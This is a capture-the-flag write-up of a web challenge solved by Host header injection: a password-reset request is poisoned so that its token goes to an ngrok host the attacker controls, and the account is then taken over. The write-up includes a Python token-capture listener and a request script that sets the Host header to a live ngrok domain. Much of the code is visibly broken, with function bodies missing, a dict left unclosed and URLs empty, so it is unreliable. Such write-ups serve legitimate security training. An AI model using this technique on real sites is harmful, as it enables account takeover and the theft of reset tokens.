Tags: hostheaderinjection web 

Rating: 5.0

### Initial Analysis

The site appeared as follows, with a login screen:


After completing the registration and login phase, you would enter a completely empty dashboard where the only available action was to log out. That’s when I realized that registering was pointless. Inspecting the page source, I found a strange comment:


the comment revealed an email, most likely belonging to the account containing the flag. Continuing to explore the site since it was a black-box challenge without any files I found the "Forgot Password" section:


Where it was possible to specify an email to reset a password. At this point, I thought about resetting the password for the account associated with the email I had found earlier. And I considered a Host Header Injection.

### Exploit

So i started ngrok on port 80:

ngrok http 80

And then, using Burp Suite, I modified the Host header to `Host: ngrok_link`. By sending the request with the modified Host header through ngrok, I was able to extract the reset token from the previously sent "Forgot Password" request with the email [email protected]:


After extracting the valid token, I reset the password using the obtained link and logged in with the account using the following credentials:

username: kctf2025
password: new_password


### Automated Exploit

I also created a fully automated exploit that performs the entire process described earlier:

ngrok http 8080
(set the ngrok url in the request.py file)
python exploit.py
python request.py
this is `exploit.py`:

import http.server
import socketserver
import requests
import re
from urllib.parse import urlparse, parse_qs

class MyHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):

# Extract the token parameter from the request
token = parse_qs(urlparse(self.path).query).get('token', [None])[0]

def send_request(self, token):

s = requests.Session()
url = ""

password = "supermario45"
data ={
# Request for the password reset of the admin account
s.post(url+"reset-password", data=data).text

# Request login admin account with Flag extraction via Regex
print("\nFLAG: " + re.search(r'KCTF{[^}]+}', s.post(url, data=credentials).text).group(0))

def start_server():
PORT = 8080
with socketserver.TCPServer(("", PORT), MyHandler) as httpd:

if __name__ == "__main__":

and this is `request.py`:

import requests

requests.post("", data={"email":"[email protected]"}, headers={"Host":"6cde-93-70-84-224.ngrok-free.app"})

### Flag